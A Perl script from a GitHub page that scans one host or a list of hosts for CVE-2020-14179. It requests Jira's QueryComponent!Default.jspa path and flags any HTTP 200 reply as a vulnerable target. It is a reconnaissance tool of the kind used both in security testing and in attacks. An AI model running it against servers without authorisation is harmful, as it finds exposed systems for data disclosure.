-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2020-14179.pl
executable file
·75 lines (72 loc) · 2.07 KB
/
CVE-2020-14179.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use Getopt::Long;
use Term::ANSIColor;
system('clear');
print color "BRIGHT_CYAN";
print"\n";
print "[+] CVE-2020-14179 Scanner [+]\n";
print "[+] Written by: Mustafa [+]\n";
print "[+] Twitter: twitter.com/c0brabaghdad1 [+]\n";
print "\n";
my $options = GetOptions(
'u=s' => \my $url,
'l=s' => \my $list,
) or die "Invalid options passed to $0\n";
my $dir = '/secure/QueryComponent!Default.jspa';chomp $dir;
if (defined($list)) {
chomp $list;
if(open(LIST,'<', $list)or die $!){
while(my $custom_wordlist = <LIST>){
chomp $custom_wordlist;
if($custom_wordlist !~ /^https?:/){
$custom_wordlist = 'http://'.$custom_wordlist;
}
my $full_url = $custom_wordlist.'/'.$dir;
my $req = HTTP::Request->new(GET=>$full_url);
my $ua = LWP::UserAgent->new(timeout => 10);
my $page = $ua->request($req);
my $status_code = $page->code();
if($status_code == 200 ){
print color 'BRIGHT_GREEN';
print "[+] 200 Found -> ";
print $full_url, "\n";
}
else {
print color 'red';
print "[*] HTTP ", $page->code(), " -> ";
print $full_url, "\n";
}
}
}
}
if (defined($url)) {
chomp $url;
if($url !~ /^https?:/){
$url = 'http://'.$url;
}
my $full_url = $url.'/'.$dir;
my $req = HTTP::Request->new(GET=>$full_url);
my $ua = LWP::UserAgent->new(timeout => 10);
my $page = $ua->request($req);
my $status_code = $page->code();
if($status_code == 200 ){
print color 'BRIGHT_GREEN';
print "[+] 200 Found -> ";
print $full_url, "\n";
}
else {
print color 'red';
print "[*] HTTP ", $page->code(), " -> ";
print $full_url, "\n";
}
}
if(!defined($url) or !defined($list)){
print color "BRIGHT_WHITE";
print "\n\n************* EXAMPLES *************\n";
print "Example 1 : ./CVE-2020-14179.pl -u https://target.tld\n";
print "Example 2 : ./CVE-2020-14179.pl -u target.tld\n";
print "Example 3 : ./CVE-2020-14179.pl -l list.txt\n";
exit 1;}